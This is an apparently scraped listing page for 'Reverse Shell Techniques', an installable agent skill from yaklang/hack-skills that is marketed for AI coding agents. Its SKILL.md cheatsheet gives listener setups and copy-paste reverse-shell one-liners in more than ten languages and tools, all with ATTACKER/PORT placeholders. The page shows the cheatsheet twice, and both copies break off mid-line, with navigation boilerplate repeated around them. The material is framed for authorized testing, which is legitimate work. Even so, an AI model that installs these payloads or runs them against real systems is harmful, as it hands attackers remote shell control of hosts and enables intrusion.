Reverse Shell Techniques

Name: Reverse Shell Techniques
Author: yaklang

yaklang/hack-skills

Quick copy-paste reverse-shell payload and listener references during authorized security assessments or defensive hardening research.

Overview

Reverse Shell Techniques is an agent skill for the Ship phase that supplies listener setups and 20+ language one-liner reverse-shell payloads for authorized security testing and defensive study.

Install

npx skills add https://github.com/yaklang/hack-skills --skill reverse-shell-techniques

What is this skill?

Copy-paste one-liner reverse shells for 20+ languages and tools with ATTACKER/PORT placeholders
Listener setup recipes for netcat, rlwrap netcat, and socat PTY listeners
Bash, Python3, PHP, Ruby, and additional runtime variants in a single cheatsheet
Supplementary reference aligned with the reverse-shell-techniques SKILL.md workflow
Designed for repeatable use in lab and authorized engagement notes
20+ languages and tools covered in the one-liner cheatsheet
ATTACKER and PORT placeholders for parameterized payloads
Multiple listener variants including netcat, rlwrap netcat, and socat PTY

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What problem does it solve?

You are validating a finding or studying RCE paths but do not want to reconstruct shell one-liners and listener commands from memory across many runtimes.

Who is it for?

Developers and security testers with explicit permission who need fast, accurate reverse-shell syntax across common stacks during reviews or training.

Skip if: Unauthorized targeting of systems you do not own; casual indie shipping with no security testing scope or legal authorization.

When should I use this skill?

You need copy-paste reverse-shell payloads or listener commands during authorized security assessments, labs, or defensive hardening research.

What do I get? / Deliverables

You get ready-to-parameterize listener and payload snippets you can drop into authorized lab or engagement notes and then trace back to hardening tasks.

Parameterized listener command for your PORT
Runtime-specific reverse-shell one-liner for ATTACKER/PORT
Engagement notes linking payload choice to mitigations

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Reverse-shell patterns are classic post-exploitation checks you validate while hardening and testing systems before and after release. Security subphase covers penetration testing, exploit validation, and understanding attacker techniques to fix misconfigurations and injection paths.

Also useful

OperateMonitoring & observability

How it compares

Use as a focused payload cheatsheet, not as a full MCP exploit framework or automated scanner.

Common Questions / FAQ

Who is reverse-shell-techniques for?

It is for builders and security practitioners doing authorized tests, CTF practice, or defensive research who need concise reverse-shell and listener examples across many languages.

When should I use reverse-shell-techniques?

Use it in Ship security work when reproducing shell callbacks in a lab, documenting exploit paths for a report, or teaching what to detect in production egress and process monitoring.

Is reverse-shell-techniques safe to install?

The skill is offensive-security reference content; review the Security Audits panel on this page, keep use inside authorized scopes, and never run payloads against systems without permission.

SKILL.md

READMESKILL.md - Reverse Shell Techniques

# REVERSE SHELL CHEATSHEET

> Supplementary reference for [reverse-shell-techniques](./SKILL.md). Replace `ATTACKER` with your IP and `PORT` with your listener port.

## Listener Setup

```bash
nc -lvnp PORT                    # Basic netcat listener
rlwrap nc -lvnp PORT             # With readline support
socat file:`tty`,raw,echo=0 TCP-LISTEN:PORT   # Full PTY listener
```

---

## Bash

```bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1

bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'

0<&196;exec 196<>/dev/tcp/ATTACKER/PORT; bash <&196 >&196 2>&196
```

## Python / Python3

```python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
```

## PHP

```bash
php -r '$sock=fsockopen("ATTACKER",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("ATTACKER",PORT);$proc=proc_open("sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
```

## Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("ATTACKER",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e'exit if fork;c=TCPSocket.new("ATTACKER",PORT);loop{c.gets.chomp!;(exit! if $_=="exit");STDOUT.reopen(c);STDERR.reopen(c);STDIN.reopen(c);system($_)}'
```

## Perl

```bash
perl -e 'use Socket;$i="ATTACKER";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ATTACKER:PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

## Netcat

```bash
nc -e /bin/sh ATTACKER PORT

nc -e /bin/bash ATTACKER PORT

# Without -e (OpenBSD nc)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER PORT >/tmp/f

# ncat
ncat ATTACKER PORT -e /bin/bash
ncat --ssl ATTACKER PORT -e /bin/bash
```

## Socat

```bash
socat TCP:ATTACKER:PORT EXEC:bash,pty,stderr,setsid,sigint,sane

socat TCP:ATTACKER:PORT EXEC:'bash -li',pty,stderr,setsid,sigint,sane

socat OPENSSL:ATTACKER:PORT,verify=0 EXEC:/bin/sh
```

## Java

```java
Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c bash$IFS-i>&/dev/tcp/ATTACKER/PORT<&1");
```

```bash
# Java one-liner (via bash)
r = Runtime.getRuntime()
r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"})
```

## Groovy

```groovy
String host="ATTACKER";int port=PORT;String cmd="bash";Process p=["bash","-c",cmd+" -i >& /dev/tcp/"+host+"/"+port+" 0>&1"].execute();
```

## PowerShell

```powershell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$t=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($t);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
```

## C# (via PowerShell)

```powershell
# Compile and execute C# reverse shell
$code = @"
using System;using System.Net.Sockets;using System.Diagnostics;using System.IO;
class S{static void Main(){TcpClient c=new TcpClient("ATTACKER",PORT);Stream s=c.GetStream();Process p=new Process();p.StartInfo.FileName="cmd.exe";p.StartInfo.RedirectStandardInput=true;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.UseShellExecute=false;p.Start();StreamWriter w=new StreamWriter(s);w.AutoFlush=true;StreamReader r=new StreamReader(s);while(true){w.Write("PS>");string cmd=r.ReadLine();if(cmd=="exit")break;p.StandardInput.WriteLine(cmd);w.Write(p.StandardOutput.ReadLine());}}}
"@
Add-Type -Type

What is this skill?

Copy-paste one-liner reverse shells for 20+ languages and tools with ATTACKER/PORT placeholders

Listener setup recipes for netcat, rlwrap netcat, and socat PTY listeners

Bash, Python3, PHP, Ruby, and additional runtime variants in a single cheatsheet

Supplementary reference aligned with the reverse-shell-techniques SKILL.md workflow

Designed for repeatable use in lab and authorized engagement notes

20+ languages and tools covered in the one-liner cheatsheet

ATTACKER and PORT placeholders for parameterized payloads

Multiple listener variants including netcat, rlwrap netcat, and socat PTY

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What do I get? / Deliverables

You get ready-to-parameterize listener and payload snippets you can drop into authorized lab or engagement notes and then trace back to hardening tasks.

Parameterized listener command for your PORT

Runtime-specific reverse-shell one-liner for ATTACKER/PORT

Engagement notes linking payload choice to mitigations

Journey fit

Primary fit

Also useful

OperateMonitoring & observability

SKILL.md

READMESKILL.md - Reverse Shell Techniques

# REVERSE SHELL CHEATSHEET

> Supplementary reference for [reverse-shell-techniques](./SKILL.md). Replace `ATTACKER` with your IP and `PORT` with your listener port.

## Listener Setup

```bash
nc -lvnp PORT                    # Basic netcat listener
rlwrap nc -lvnp PORT             # With readline support
socat file:`tty`,raw,echo=0 TCP-LISTEN:PORT   # Full PTY listener
```

---

## Bash

```bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1

bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'

0<&196;exec 196<>/dev/tcp/ATTACKER/PORT; bash <&196 >&196 2>&196
```

## Python / Python3

```python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
```

## PHP

```bash
php -r '$sock=fsockopen("ATTACKER",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("ATTACKER",PORT);$proc=proc_open("sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
```

## Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("ATTACKER",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e'exit if fork;c=TCPSocket.new("ATTACKER",PORT);loop{c.gets.chomp!;(exit! if $_=="exit");STDOUT.reopen(c);STDERR.reopen(c);STDIN.reopen(c);system($_)}'
```

## Perl

```bash
perl -e 'use Socket;$i="ATTACKER";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ATTACKER:PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

## Netcat

```bash
nc -e /bin/sh ATTACKER PORT

nc -e /bin/bash ATTACKER PORT

# Without -e (OpenBSD nc)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER PORT >/tmp/f

# ncat
ncat ATTACKER PORT -e /bin/bash
ncat --ssl ATTACKER PORT -e /bin/bash
```

## Socat

```bash
socat TCP:ATTACKER:PORT EXEC:bash,pty,stderr,setsid,sigint,sane

socat TCP:ATTACKER:PORT EXEC:'bash -li',pty,stderr,setsid,sigint,sane

socat OPENSSL:ATTACKER:PORT,verify=0 EXEC:/bin/sh
```

## Java

```java
Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c bash$IFS-i>&/dev/tcp/ATTACKER/PORT<&1");
```

```bash
# Java one-liner (via bash)
r = Runtime.getRuntime()
r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"})
```

## Groovy

```groovy
String host="ATTACKER";int port=PORT;String cmd="bash";Process p=["bash","-c",cmd+" -i >& /dev/tcp/"+host+"/"+port+" 0>&1"].execute();
```

## PowerShell

```powershell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$t=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($t);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
```

## C# (via PowerShell)

```powershell
# Compile and execute C# reverse shell
$code = @"
using System;using System.Net.Sockets;using System.Diagnostics;using System.IO;
class S{static void Main(){TcpClient c=new TcpClient("ATTACKER",PORT);Stream s=c.GetStream();Process p=new Process();p.StartInfo.FileName="cmd.exe";p.StartInfo.RedirectStandardInput=true;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.UseShellExecute=false;p.Start();StreamWriter w=new StreamWriter(s);w.AutoFlush=true;StreamReader r=new StreamReader(s);while(true){w.Write("PS>");string cmd=r.ReadLine();if(cmd=="exit")break;p.StandardInput.WriteLine(cmd);w.Write(p.StandardOutput.ReadLine());}}}
"@
Add-Type -Type

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is reverse-shell-techniques for?

When should I use reverse-shell-techniques?

Is reverse-shell-techniques safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is reverse-shell-techniques for?

When should I use reverse-shell-techniques?

Is reverse-shell-techniques safe to install?

SKILL.md